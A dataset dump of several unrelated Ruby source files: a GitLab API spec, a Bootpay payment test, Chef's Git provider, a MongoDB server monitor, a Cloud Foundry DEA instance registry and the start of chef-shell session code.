post api("/projects/#{project.id}/fork", user2), namespace: group2.name
expect(response).to have_http_status(201)
expect(json_response['namespace']['name']).to eq(group2.name)
end
it 'fails to fork to a group not owned by the user' do
post api("/projects/#{project.id}/fork", user2), namespace: group.name
expect(response).to have_http_status(404)
end
it 'forks to a group not owned by the user when admin' do
post api("/projects/#{project.id}/fork", admin), namespace: group.name
expect(response).to have_http_status(201)
expect(json_response['namespace']['name']).to eq(group.name)
end
end
context 'when unauthenticated' do
it 'returns authentication error' do
post api("/projects/#{project.id}/fork")
expect(response).to have_http_status(401)
expect(json_response['message']).to eq('401 Unauthorized')
end
end
end
describe 'POST /projects/:id/housekeeping' do
let(:housekeeping) { Projects::HousekeepingService.new(project) }
before do
allow(Projects::HousekeepingService).to receive(:new).with(project).and_return(housekeeping)
end
context 'when authenticated as owner' do
it 'starts the housekeeping process' do
expect(housekeeping).to receive(:execute).once
post api("/projects/#{project.id}/housekeeping", user)
expect(response).to have_http_status(201)
end
context 'when housekeeping lease is taken' do
it 'returns conflict' do
expect(housekeeping).to receive(:execute).once.and_raise(Projects::HousekeepingService::LeaseTaken)
post api("/projects/#{project.id}/housekeeping", user)
expect(response).to have_http_status(409)
expect(json_response['message']).to match(/Somebody already triggered housekeeping for this project/)
end
end
end
context 'when authenticated as developer' do
before do
project_member
end
it 'returns forbidden error' do
post api("/projects/#{project.id}/housekeeping", user3)
expect(response).to have_http_status(403)
end
end
context 'when unauthenticated' do
it 'returns authentication error' do
post api("/projects/#{project.id}/housekeeping")
expect(response).to have_http_status(401)
end
end
end
end
require "spec_helper"
RSpec.describe Bootpay do
it 'requests a remote payment form' do
bootpay = Bootpay::ServerApi.new(
'5b9f51264457636ab9a07cde',
'sfilSOSVakw+PZA+PRux4Iuwm7a//9CXXudCq9TMDHk=',
:development
)
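# Request a server-generated ("remote") payment form: the first hash holds the
# order/form options, the second the optional SMS notification settings.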
result = bootpay.remote_form(
{
pg: 'danal',
fm: ['card', 'phone'],
n: '테스트 결제', # product name
o_key: 'unique_value_1234', # merchant's unique key for this product
is_r_n: false, # whether the buyer may enter the product name
is_r_p: false, # whether the buyer may enter the price
is_addr: false, # whether to show an address field
is_da: false, # whether to add a shipping fee
is_memo: false, # whether to collect a memo from the buyer
tfp: 0, # tax-free amount
ip: 10000, # item sale price
dp: 0, # display price, i.e. the pre-discount price; covers coupon/promotion discounts - a concept introduced because of Payco
dap: 0, # base shipping fee
dap_jj: 0, # shipping fee for Jeju
dap_njj: 0 # extra fee for remote island/mountain areas outside Jeju
},
{
# st: 1, # 1: SMS, 2: LMS, 3: MMS, 4: KakaoTalk AlimTalk, 5: KakaoTalk FriendTalk
# rps: ['010-1234-5678', '010-1111-2222'], # recipient phone numbers
# sp: '010-1234-1111', # sender phone number
# msg: '테스트 문자입니다' # test message body ("This is a test message")
}
)
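# A successful call yields a non-empty hash whose :status mirrors the HTTP status.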
expect(result).not_to be_empty
expect(result[:status]).to eq(200)
# print result
end
end
#
# Author:: Daniel DeLeo (<[email protected]>)
# Copyright:: Copyright (c) Chef Software Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require_relative "../exceptions"
require_relative "../log"
require_relative "../provider"
require "fileutils" unless defined?(FileUtils)
class Chef
class Provider
class Git < Chef::Provider
extend Forwardable
provides :git
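# Extracts the semantic version from `git --version` output (e.g. "git version 2.39.1").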
GIT_VERSION_PATTERN = Regexp.compile('git version (\d+\.\d+\.\d+)')
def_delegator :new_resource, :destination, :cwd
def load_current_resource
@resolved_reference = nil
@current_resource = Chef::Resource::Git.new(new_resource.name)
if current_revision = find_current_revision
current_resource.revision current_revision
end
end
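# Pre-flight checks: in why-run mode these assertions are reported as
# assumptions rather than aborting the run outright.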
def define_resource_requirements
unless new_resource.user.nil?
requirements.assert(:all_actions) do |a|
a.assertion do
get_homedir(new_resource.user)
rescue ArgumentError
false
end
a.whyrun("User #{new_resource.user} does not exist, this run will fail unless it has been previously created. Assuming it would have been created.")
a.failure_message(Chef::Exceptions::User, "#{new_resource.user} required by resource #{new_resource.name} does not exist")
end
end
# Parent directory of the target must exist.
requirements.assert(:checkout, :sync) do |a|
dirname = ::File.dirname(cwd)
a.assertion { ::File.directory?(dirname) }
a.whyrun("Directory #{dirname} does not exist, this run will fail unless it has been previously created. Assuming it would have been created.")
a.failure_message(Chef::Exceptions::MissingParentDirectory,
"Cannot clone #{new_resource} to #{cwd}, the enclosing directory #{dirname} does not exist")
end
requirements.assert(:all_actions) do |a|
a.assertion { !(new_resource.revision =~ %r{^origin/}) }
a.failure_message Chef::Exceptions::InvalidRemoteGitReference,
"Deploying remote branches is not supported. " +
"Specify the remote branch as a local branch for " +
"the git repository you're deploying from " +
"(ie: '#{new_resource.revision.gsub("origin/", "")}' rather than '#{new_resource.revision}')."
end
requirements.assert(:all_actions) do |a|
# this can't be recovered from in why-run mode, because nothing that
# we do in the course of a run is likely to create a valid target_revision
# if we can't resolve it up front.
a.assertion { !target_revision.nil? }
a.failure_message Chef::Exceptions::UnresolvableGitReference,
"Unable to parse SHA reference for '#{new_resource.revision}' in repository '#{new_resource.repository}'. " +
"Verify your (case-sensitive) repository URL and revision.\n" +
"`git ls-remote '#{new_resource.repository}' '#{rev_search_pattern}'` output: #{@resolved_reference}"
end
end
action :checkout do
if target_dir_non_existent_or_empty?
clone
if new_resource.enable_checkout
checkout
end
enable_submodules
add_remotes
else
logger.debug "#{new_resource} checkout destination #{cwd} already exists or is a non-empty directory"
end
end
action :export do
action_checkout
converge_by("complete the export by removing #{cwd}.git after checkout") do
FileUtils.rm_rf(::File.join(cwd, ".git"))
end
end
action :sync do
if existing_git_clone?
logger.trace "#{new_resource} current revision: #{current_resource.revision} target revision: #{target_revision}"
unless current_revision_matches_target_revision?
fetch_updates
enable_submodules
logger.info "#{new_resource} updated to revision #{target_revision}"
end
add_remotes
else
action_checkout
end
end
def git_has_single_branch_option?
@git_has_single_branch_option ||= !git_gem_version.nil? && git_gem_version >= Gem::Version.new("1.7.10")
end
def git_gem_version
return @git_gem_version if defined?(@git_gem_version)
output = git("--version").stdout
match = GIT_VERSION_PATTERN.match(output)
if match
@git_gem_version = Gem::Version.new(match[1])
else
logger.warn "Unable to parse git version from '#{output}'"
@git_gem_version = nil
end
@git_gem_version
end
def existing_git_clone?
::File.exist?(::File.join(cwd, ".git"))
end
def target_dir_non_existent_or_empty?
!::File.exist?(cwd) || Dir.entries(cwd).sort == [".", ".."]
end
def find_current_revision
logger.trace("#{new_resource} finding current git revision")
if ::File.exist?(::File.join(cwd, ".git"))
# 128 is returned when we're not in a git repo. this is fine
result = git("rev-parse", "HEAD", cwd: cwd, returns: [0, 128]).stdout.strip
end
sha_hash?(result) ? result : nil
end
def already_on_target_branch?
current_branch = git("rev-parse", "--abbrev-ref", "HEAD", cwd: cwd, returns: [0, 128]).stdout.strip
current_branch == (new_resource.checkout_branch || new_resource.revision)
end
def add_remotes
if new_resource.additional_remotes.length > 0
new_resource.additional_remotes.each_pair do |remote_name, remote_url|
converge_by("add remote #{remote_name} from #{remote_url}") do
logger.info "#{new_resource} adding git remote #{remote_name} = #{remote_url}"
setup_remote_tracking_branches(remote_name, remote_url)
end
end
end
end
def clone
converge_by("clone from #{repo_url} into #{cwd}") do
remote = new_resource.remote
clone_cmd = ["clone"]
clone_cmd << "-o #{remote}" unless remote == "origin"
clone_cmd << "--depth #{new_resource.depth}" if new_resource.depth
clone_cmd << "--no-single-branch" if new_resource.depth && git_has_single_branch_option?
clone_cmd << "\"#{new_resource.repository}\""
clone_cmd << "\"#{cwd}\""
logger.info "#{new_resource} cloning repo #{repo_url} to #{cwd}"
git clone_cmd
end
end
def checkout
converge_by("checkout ref #{target_revision} branch #{new_resource.revision}") do
# checkout into a local branch rather than a detached HEAD
if new_resource.checkout_branch
# check out to a local branch
git("branch", "-f", new_resource.checkout_branch, target_revision, cwd: cwd)
git("checkout", new_resource.checkout_branch, cwd: cwd)
logger.info "#{new_resource} checked out branch: #{new_resource.revision} onto: #{new_resource.checkout_branch} reference: #{target_revision}"
elsif sha_hash?(new_resource.revision) || !is_branch?
# detached head
git("checkout", target_revision, cwd: cwd)
logger.info "#{new_resource} checked out reference: #{target_revision}"
elsif already_on_target_branch?
# we are already on the proper branch
git("reset", "--hard", target_revision, cwd: cwd)
else
# need a branch with a tracking branch
git("branch", "-f", new_resource.revision, target_revision, cwd: cwd)
git("checkout", new_resource.revision, cwd: cwd)
git("branch", "-u", "#{new_resource.remote}/#{new_resource.revision}", cwd: cwd)
logger.info "#{new_resource} checked out branch: #{new_resource.revision} reference: #{target_revision}"
end
end
end
def enable_submodules
if new_resource.enable_submodules
converge_by("enable git submodules for #{new_resource}") do
logger.info "#{new_resource} synchronizing git submodules"
git("submodule", "sync", cwd: cwd)
logger.info "#{new_resource} enabling git submodules"
# the --recursive flag means we require git 1.6.5+ now, see CHEF-1827
git("submodule", "update", "--init", "--recursive", cwd: cwd)
end
end
end
def fetch_updates
setup_remote_tracking_branches(new_resource.remote, new_resource.repository)
converge_by("fetch updates for #{new_resource.remote}") do
# since we're in a local branch already, just reset to specified revision rather than merge
logger.trace "Fetching updates from #{new_resource.remote} and resetting to revision #{target_revision}"
git("fetch", "--prune", new_resource.remote, cwd: cwd)
git("fetch", new_resource.remote, "--tags", cwd: cwd)
if sha_hash?(new_resource.revision) || is_tag? || already_on_target_branch?
# detached head or if we are already on the proper branch
git("reset", "--hard", target_revision, cwd: cwd)
elsif new_resource.checkout_branch
# check out to a local branch
git("branch", "-f", new_resource.checkout_branch, target_revision, cwd: cwd)
git("checkout", new_resource.checkout_branch, cwd: cwd)
else
# need a branch with a tracking branch
git("branch", "-f", new_resource.revision, target_revision, cwd: cwd)
git("checkout", new_resource.revision, cwd: cwd)
git("branch", "-u", "#{new_resource.remote}/#{new_resource.revision}", cwd: cwd)
end
end
end
def setup_remote_tracking_branches(remote_name, remote_url)
converge_by("set up remote tracking branches for #{remote_url} at #{remote_name}") do
logger.trace "#{new_resource} configuring remote tracking branches for repository #{remote_url} " + "at remote #{remote_name}"
check_remote_command = ["config", "--get", "remote.#{remote_name}.url"]
remote_status = git(check_remote_command, cwd: cwd, returns: [0, 1, 2])
case remote_status.exitstatus
when 0, 2
# * Status 0 means that we already have a remote with this name, so we should update the url
# if it doesn't match the url we want.
# * Status 2 means that we have multiple urls assigned to the same remote (not a good idea)
# which we can fix by replacing them all with our target url (hence the --replace-all option)
if multiple_remotes?(remote_status) || !remote_matches?(remote_url, remote_status)
git("config", "--replace-all", "remote.#{remote_name}.url", %{"#{remote_url}"}, cwd: cwd)
end
when 1
git("remote", "add", remote_name, remote_url, cwd: cwd)
end
end
end
def multiple_remotes?(check_remote_command_result)
check_remote_command_result.exitstatus == 2
end
def remote_matches?(remote_url, check_remote_command_result)
check_remote_command_result.stdout.strip.eql?(remote_url)
end
def current_revision_matches_target_revision?
(!current_resource.revision.nil?) && (target_revision.strip.to_i(16) == current_resource.revision.strip.to_i(16))
end
def target_revision
  @target_revision ||=
    if sha_hash?(new_resource.revision)
      new_resource.revision
    else
      remote_resolve_reference
    end
end
alias :revision_slug :target_revision
def remote_resolve_reference
logger.trace("#{new_resource} resolving remote reference")
# The sha pointed to by an annotated tag is identified by the
# '^{}' suffix appended to the tag. In order to resolve
# annotated tags, we have to search for "revision*" and
# post-process. Special handling for 'HEAD' to ignore a tag
# named 'HEAD'.
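# Illustrative (hypothetical) ls-remote output for revision 'v1.0':
#   2f0d0b5...\trefs/tags/v1.0
#   8a94c20...\trefs/tags/v1.0^{}
# The '^{}' entry names the tagged commit itself, so it is preferred.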
@resolved_reference = git_ls_remote(rev_search_pattern)
refs = @resolved_reference.split("\n").map { |line| line.split("\t") }
# First try for ^{} indicating the commit pointed to by an
# annotated tag.
# It is possible for a user to create a tag named 'HEAD'.
# Using such a degenerate annotated tag would be very
# confusing. We avoid the issue by disallowing the use of
# annotated tags named 'HEAD'.
if rev_search_pattern != "HEAD"
found = find_revision(refs, new_resource.revision, "^{}")
else
found = refs_search(refs, "HEAD")
end
found = find_revision(refs, new_resource.revision) if found.empty?
found.size == 1 ? found.first[0] : nil
end
def find_revision(refs, revision, suffix = "")
found = refs_search(refs, rev_match_pattern("refs/tags/", revision) + suffix)
if !found.empty?
@is_tag = true
found
else
found = refs_search(refs, rev_match_pattern("refs/heads/", revision) + suffix)
if !found.empty?
@is_branch = true
found
else
refs_search(refs, revision + suffix)
end
end
end
def rev_match_pattern(prefix, revision)
if revision.start_with?(prefix)
revision
else
prefix + revision
end
end
def rev_search_pattern
if ["", "HEAD"].include? new_resource.revision
"HEAD"
else
new_resource.revision + "*"
end
end
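# e.g. a revision of "v1.0" yields the search pattern "v1.0*", so that
# `git ls-remote` also returns the annotated-tag entry "v1.0^{}".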
def git_ls_remote(rev_pattern)
git("ls-remote", "\"#{new_resource.repository}\"", "\"#{rev_pattern}\"").stdout
end
def refs_search(refs, pattern)
refs.find_all { |m| m[1] == pattern }
end
alias git_minor_version git_gem_version
private
def is_branch?
!!@is_branch
end
def is_tag?
!!@is_tag
end
def run_options(run_opts = {})
env = {}
if new_resource.user
run_opts[:user] = new_resource.user
# Certain versions of `git` misbehave if git configuration is
# inaccessible in $HOME. We need to ensure $HOME matches the
# user who is executing `git` not the user running Chef.
env["HOME"] = get_homedir(new_resource.user)
end
run_opts[:group] = new_resource.group if new_resource.group
env["GIT_SSH"] = new_resource.ssh_wrapper if new_resource.ssh_wrapper
run_opts[:log_tag] = new_resource.to_s
run_opts[:timeout] = new_resource.timeout if new_resource.timeout
env.merge!(new_resource.environment) if new_resource.environment
run_opts[:environment] = env unless env.empty?
run_opts
end
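# Illustrative result (hypothetical resource settings): for user "deploy"
# with an ssh_wrapper and a 300s timeout, run_options would resemble
#   { user: "deploy", log_tag: "git[app]", timeout: 300,
#     environment: { "HOME" => "/home/deploy", "GIT_SSH" => "/opt/wrapper.sh" } }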
def git(*args, **run_opts)
git_command = ["git", args].compact.join(" ")
logger.trace "running #{git_command}"
shell_out!(git_command, **run_options(run_opts))
end
def sha_hash?(string)
string =~ /^[0-9a-f]{40}$/
end
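# Illustrative checks (not part of the provider):
#   sha_hash?("0123456789abcdef0123456789abcdef01234567") # => truthy
#   sha_hash?("v1.0")                                     # => nil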
# Returns a placeholder message when the repository URL is sensitive;
# otherwise the repository URL is returned.
# @return [String]
def repo_url
if new_resource.sensitive
"**Suppressed Sensitive URL**"
else
new_resource.repository
end
end
# Returns the home directory of the user
# @param [String, Integer] user the user name or UID of the user.
# @return [String] the home directory of the user.
#
def get_homedir(user)
require "etc" unless defined?(Etc)
case user
when Integer
Etc.getpwuid(user).dir
else
Etc.getpwnam(user.to_s).dir
end
end
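# e.g. get_homedir("root") typically resolves to "/root" on Linux, and
# get_homedir(0) resolves the same account via its UID.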
end
end
end
| 39.167453 | 160 | 0.622569 |
38b77568a3905c30d672b5afc80c85043035887b | 5,317 | # Copyright (C) 2014-2015 MongoDB Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'mongo/server/monitor/connection'
module Mongo
class Server
# This object is responsible for keeping server status up to date, running in
# a separate thread so as not to disrupt other operations.
#
# @since 2.0.0
class Monitor
include Loggable
# The default time for a server to refresh its status is 10 seconds.
#
# @since 2.0.0
HEARTBEAT_FREQUENCY = 10.freeze
# The minimum time between forced server scans. This corresponds to
# minHeartbeatFrequencyMS in the SDAM spec.
#
# @since 2.0.0
MIN_SCAN_FREQUENCY = 0.5.freeze
# The command used for determining server status.
#
# @since 2.0.0
STATUS = { :ismaster => 1 }.freeze
# The constant for the ismaster command.
#
# @since 2.0.0
ISMASTER = Protocol::Query.new(Database::ADMIN, Database::COMMAND, STATUS, :limit => -1)
# The weighting factor (alpha) for calculating the average moving round trip time.
#
# @since 2.0.0
RTT_WEIGHT_FACTOR = 0.2.freeze
# @return [ Mongo::Connection ] connection The connection to use.
attr_reader :connection
# @return [ Server::Description ] description The server
# description the monitor refreshes.
attr_reader :description
# @return [ Description::Inspector ] inspector The description inspector.
attr_reader :inspector
# @return [ Hash ] options The server options.
attr_reader :options
# Force the monitor to immediately do a check of its server.
#
# @example Force a scan.
# monitor.scan!
#
# @return [ Description ] The updated description.
#
# @since 2.0.0
def scan!
throttle_scan_frequency!
@description = inspector.run(description, *ismaster)
end
# Get the refresh interval for the server. This will be defined via an option
# or will default to HEARTBEAT_FREQUENCY (10 seconds).
#
# @example Get the refresh interval.
# server.heartbeat_frequency
#
# @return [ Integer ] The heartbeat frequency, in seconds.
#
# @since 2.0.0
def heartbeat_frequency
@heartbeat_frequency ||= options[:heartbeat_frequency] || HEARTBEAT_FREQUENCY
end
# Create the new server monitor.
#
# @example Create the server monitor.
# Mongo::Server::Monitor.new(address, listeners)
#
# @param [ Address ] address The address to monitor.
# @param [ Event::Listeners ] listeners The event listeners.
# @param [ Hash ] options The options.
#
# @since 2.0.0
def initialize(address, listeners, options = {})
@description = Description.new(address, {})
@inspector = Description::Inspector.new(listeners)
@options = options.freeze
@connection = Connection.new(address, options)
@last_round_trip_time = nil
@mutex = Mutex.new
end
# Runs the server monitor. Refreshing happens on a separate thread per
# server.
#
# @example Run the monitor.
# monitor.run!
#
# @return [ Thread ] The thread the monitor runs on.
#
# @since 2.0.0
def run!
@thread = Thread.new(heartbeat_frequency) do |i|
loop do
sleep(i)
scan!
end
end
end
# Stops the server monitor. Kills the thread so it doesn't continue
# taking memory and sending commands to the connection.
#
# @example Stop the monitor.
# monitor.stop!
#
# @return [ Boolean ] Is the Thread stopped?
#
# @since 2.0.0
def stop!
@thread.kill && @thread.stop?
end
private
def average_round_trip_time(start)
new_rtt = Time.now - start
RTT_WEIGHT_FACTOR * new_rtt + (1 - RTT_WEIGHT_FACTOR) * (@last_round_trip_time || new_rtt)
end
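# Worked example (illustrative numbers): with a previous average of 0.1s
# and a new sample of 0.05s, the new average is
#   0.2 * 0.05 + 0.8 * 0.1 = 0.09 # seconds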
def calculate_average_round_trip_time(start)
@last_round_trip_time = average_round_trip_time(start)
end
def ismaster
@mutex.synchronize do
start = Time.now
begin
result = connection.dispatch([ ISMASTER ]).documents[0]
return result, calculate_average_round_trip_time(start)
rescue Exception => e
log_debug([ e.message ])
return {}, calculate_average_round_trip_time(start)
end
end
end
def throttle_scan_frequency!
if @last_scan
difference = (Time.now - @last_scan)
throttle_time = (MIN_SCAN_FREQUENCY - difference)
sleep(throttle_time) if throttle_time > 0
end
@last_scan = Time.now
end
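# e.g. (illustrative): if the last scan finished 0.2s ago, this sleeps
# for MIN_SCAN_FREQUENCY - 0.2 = 0.3s before permitting the next scan.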
end
end
end
| 30.039548 | 98 | 0.621215 |
4ae5418391b2e8e2021a487b898e24ce57894d43 | 8,552 | # coding: UTF-8
require "steno"
require "steno/core_ext"
require "sys/filesystem"
require "thread"
require "dea/loggregator"
require "dea/registry_enumeration"
module Dea
class InstanceRegistry
DEFAULT_CRASH_LIFETIME_SECS = 60 * 60
CRASHES_REAPER_INTERVAL_SECS = 10
DEFAULT_STOPPING_LIFETIME_SECS = 60
include Enumerable
include RegistryEnumeration
attr_reader :config
attr_reader :crash_lifetime_secs
def initialize(config = {})
@config = config
@instances = {}
@instances_by_app_id = {}
@crash_lifetime_secs = config["crash_lifetime_secs"] || DEFAULT_CRASH_LIFETIME_SECS
end
def start_reaper
EM.add_periodic_timer(CRASHES_REAPER_INTERVAL_SECS) do
reap_orphaned_crashes
reap_crashes
reap_crashes_under_disk_pressure
reap_stopping
end
end
def register(instance)
app_id = instance.application_id
Dea::Loggregator.emit(app_id,
"Starting app instance (index #{instance.instance_index}) with guid #{instance.application_id}")
logger.debug2("Registering instance #{instance.instance_id}")
add_instance(instance)
end
def unregister(instance)
app_id = instance.application_id
Dea::Loggregator.emit(app_id,
"Stopping app instance (index #{instance.instance_index}) with guid #{instance.application_id}")
logger.debug2("Stopping instance #{instance.instance_id}")
remove_instance(instance)
logger.debug2("Stopped instance #{instance.instance_id}")
Dea::Loggregator.emit(app_id,
"Stopped app instance (index #{instance.instance_index}) with guid #{instance.application_id}")
end
def change_instance_id(instance)
remove_instance(instance)
instance.change_instance_id!
add_instance(instance)
end
def instances_for_application(app_id)
@instances_by_app_id[app_id] || {}
end
def lookup_instance(instance_id)
@instances[instance_id]
end
def to_hash
@instances_by_app_id.each.with_object({}) do |(app_id, instances), hash|
hash[app_id] =
instances.each.with_object({}) do |(id, instance), is|
is[id] = instance.attributes_and_stats
end
end
end
def app_id_to_count
app_count = {}
@instances_by_app_id.each do |app_id, instance_hash|
app_count[app_id] = instance_hash.size
end
app_count
end
def each(&block)
@instances.each_value(&block)
end
def instances
@instances.values
end
def empty?
@instances.empty?
end
def size
@instances.size
end
def reap_orphaned_crashes
logger.debug2("Reaping orphaned crashes")
crashes = Dir[File.join(config.crashes_path, "*")].map do |path|
if File.directory?(path)
File.basename(path)
end
end
crashes.compact.each do |instance_id|
instance = lookup_instance(instance_id)
# Reap if this instance is not referenced
if instance.nil?
reap_crash(instance_id, "orphaned")
end
end
end
def reap_stopping
logger.debug2("Reaping stopping")
stopping_by_app = Hash.new { |h, k| h[k] = [] }
select(&:stopping?).each { |i| stopping_by_app[i.application_id] << i }
now = Time.now.to_i
stopping_by_app.each do |app_id, instances|
instances.each_with_index do |instance, idx|
secs_since_stopping = now - instance.state_timestamp
if (secs_since_stopping > DEFAULT_STOPPING_LIFETIME_SECS)
instance.stop do |error|
logger.warn("Failed to reap stopping #{instance}: #{error}") if error
end
end
end
end
end
def reap_crashes
logger.debug2("Reaping crashes")
crashes_by_app = Hash.new { |h, k| h[k] = [] }
select(&:crashed?).each { |i| crashes_by_app[i.application_id] << i }
now = Time.now.to_i
crashes_by_app.each do |app_id, instances|
# Most recent crashes first
instances.sort! { |a, b| b.state_timestamp <=> a.state_timestamp }
instances.each_with_index do |instance, idx|
secs_since_crash = now - instance.state_timestamp
# Remove if not most recent, or too old
if (idx > 0) || (secs_since_crash > crash_lifetime_secs)
reap_crash(instance.instance_id, "stale")
end
end
end
end
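# e.g. (hypothetical): with crashes at t=100, t=90 and t=10, now=120 and a
# configured lifetime of 60s, t=90 and t=10 are reaped: the first for not
# being the most recent crash, the second for exceeding crash_lifetime_secs.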
def reap_crashes_under_disk_pressure
logger.debug2("Reaping crashes under disk pressure")
if disk_pressure?
instance = select { |i| i.crashed? }.
sort_by { |i| i.state_timestamp }.
first
# Remove oldest crash
if instance
reap_crash(instance.instance_id, "disk pressure") do
# Continue reaping crashes when done
reap_crashes_under_disk_pressure
end
end
end
end
def reap_crash(instance_id, reason = nil, &blk)
instance = lookup_instance(instance_id)
data = {
:instance_id => instance_id,
:reason => reason,
}
if instance
data[:application_id] = instance.application_id
data[:application_version] = instance.application_version
data[:application_name] = instance.application_name
end
message = "Removing crash #{instance_id}"
logger.debug(message, data)
Dea::Loggregator.emit(data[:application_id], "Removing crash for app with id #{data[:application_id]}")
t = Time.now
destroy_crash_artifacts(instance_id) do
logger.debug(message + ": took %.3fs" % (Time.now - t), data)
blk.call if blk
end
unregister(instance) if instance
end
def destroy_crash_artifacts(instance_id, &callback)
crash_path = File.join(config.crashes_path, instance_id)
return if crash_path.nil?
operation = lambda do
logger.debug2("Removing path #{crash_path}")
begin
FileUtils.rm_rf(crash_path)
rescue => e
logger.log_exception(e)
end
end
EM.defer(operation, callback)
end
def disk_pressure?
r = false
begin
stat = Sys::Filesystem.stat(config.crashes_path)
block_usage_ratio = Float(stat.blocks - stat.blocks_free) / Float(stat.blocks)
inode_usage_ratio = Float(stat.files - stat.files_free) / Float(stat.files)
r ||= block_usage_ratio > config.crash_block_usage_ratio_threshold
r ||= inode_usage_ratio > config.crash_inode_usage_ratio_threshold
if r
logger.debug("Disk usage (block/inode): %.3f/%.3f" % [block_usage_ratio, inode_usage_ratio])
end
rescue => e
logger.log_exception(e)
end
r
end
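# e.g. (illustrative numbers): 1000 blocks with 50 free gives a block
# usage ratio of (1000 - 50) / 1000 = 0.95, which reports pressure
# whenever the configured threshold is below 0.95.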
def instances_filtered_by_message(message)
app_id = message.data["droplet"].to_s
logger.debug2("Filter message for app_id: %s" % app_id, app_id: app_id)
instances = instances_for_application(app_id)
if instances.empty?
logger.debug2("No instances found for app_id: %s" % app_id, app_id: app_id)
return
end
make_set = lambda { |key| Set.new(message.data.fetch(key, [])) }
version = message.data["version"]
instance_ids = make_set.call("instances") | make_set.call("instance_ids")
indices = make_set.call("indices")
states = make_set.call("states").map { |e| Dea::Instance::State.from_external(e) }
instances.each do |_, instance|
next if version && (instance.application_version != version)
next if instance_ids.any? && !instance_ids.include?(instance.instance_id)
next if indices.any? && !indices.include?(instance.instance_index)
next if states.any? && !states.include?(instance.state)
yield(instance)
end
end
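# Illustrative message data (hypothetical):
#   { "droplet" => "app-1", "indices" => [0, 2], "states" => ["RUNNING"] }
# yields only the RUNNING instances of app-1 at indices 0 and 2.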
private
def add_instance(instance)
@instances[instance.instance_id] = instance
app_id = instance.application_id
@instances_by_app_id[app_id] ||= {}
@instances_by_app_id[app_id][instance.instance_id] = instance
nil
end
def remove_instance(instance)
@instances.delete(instance.instance_id)
app_id = instance.application_id
if @instances_by_app_id.has_key?(app_id)
@instances_by_app_id[app_id].delete(instance.instance_id)
if @instances_by_app_id[app_id].empty?
@instances_by_app_id.delete(app_id)
end
end
nil
end
end
end
| 27.235669 | 109 | 0.643592 |
287cf0c166f0255fe2880e02b7b449d2672a4065 | 8,101 | #--
# Author:: Daniel DeLeo (<[email protected]>)
# Author:: Tim Hinderliter (<[email protected]>)
# Copyright:: Copyright (c) 2009 Daniel DeLeo
# Copyright:: Copyright (c) 2011 Opscode, Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'chef/recipe'
require 'chef/run_context'
require 'chef/config'
require 'chef/client'
require 'chef/cookbook/cookbook_collection'
require 'chef/cookbook_loader'
require 'chef/run_list/run_list_expansion'
require 'chef/formatters/base'
require 'chef/formatters/doc'
require 'chef/formatters/minimal'
module Shell
class ShellSession
include Singleton
def self.session_type(type=nil)
@session_type = type if type
@session_type
end
attr_accessor :node, :compile, :recipe, :run_context
attr_reader :node_attributes, :client
def initialize
@node_built = false
formatter = Chef::Formatters.new(Chef::Config.formatter, STDOUT, STDERR)
@events = Chef::EventDispatch::Dispatcher.new(formatter)
end
def node_built?
!!@node_built
end
def reset!
loading do
rebuild_node
@node = client.node
shorten_node_inspect
Shell::Extensions.extend_context_node(@node)
rebuild_context
node.consume_attributes(node_attributes) if node_attributes
@recipe = Chef::Recipe.new(nil, nil, run_context)
Shell::Extensions.extend_context_recipe(@recipe)
@node_built = true
end
end
def node_attributes=(attrs)
@node_attributes = attrs
@node.consume_attributes(@node_attributes)
end
def resource_collection
run_context.resource_collection
end
def run_context
@run_context ||= rebuild_context
end
def definitions
nil
end
def cookbook_loader
nil
end
def save_node
raise "Not Supported! #{self.class.name} doesn't support #save_node, maybe you need to run chef-shell in client mode?"
end
def rebuild_context
raise "Not Implemented! :rebuild_collection should be implemented by subclasses"
end
private
def loading
show_loading_progress
begin
yield
rescue => e
loading_complete(false)
raise e
else
loading_complete(true)
end
end
def show_loading_progress
print "Loading"
@loading = true
@dot_printer = Thread.new do
while @loading
print "."
sleep 0.5
end
end
end
def loading_complete(success)
@loading = false
@dot_printer.join
msg = success ? "done.\n\n" : "epic fail!\n\n"
print msg
end
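# Redefining inspect on @node's singleton below keeps console output terse
# without monkey-patching Chef::Node globally.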
def shorten_node_inspect
def @node.inspect
"<Chef::Node:0x#{self.object_id.to_s(16)} @name=\"#{self.name}\">"
end
end
def rebuild_node
raise "Not Implemented! :rebuild_node should be implemented by subclasses"
end
end
class StandAloneSession < ShellSession
session_type :standalone
def rebuild_context
cookbook_collection = Chef::CookbookCollection.new({})
@run_context = Chef::RunContext.new(@node, cookbook_collection, @events) # no recipes
@run_context.load(Chef::RunList::RunListExpansionFromDisk.new("_default", [])) # empty recipe list
end
private
def rebuild_node
Chef::Config[:solo] = true
@client = Chef::Client.new
@client.run_ohai
@client.load_node
@client.build_node
end
end
class SoloSession < ShellSession
session_type :solo
def definitions
@run_context.definitions
end
def rebuild_context
@run_status = Chef::RunStatus.new(@node, @events)
Chef::Cookbook::FileVendor.on_create { |manifest| Chef::Cookbook::FileSystemFileVendor.new(manifest, Chef::Config[:cookbook_path]) }
cl = Chef::CookbookLoader.new(Chef::Config[:cookbook_path])
cl.load_cookbooks
cookbook_collection = Chef::CookbookCollection.new(cl)
@run_context = Chef::RunContext.new(node, cookbook_collection, @events)
@run_context.load(Chef::RunList::RunListExpansionFromDisk.new("_default", []))
@run_status.run_context = run_context
end
private
def rebuild_node
# Tell the client we're chef solo so it won't try to contact the server
Chef::Config[:solo] = true
@client = Chef::Client.new
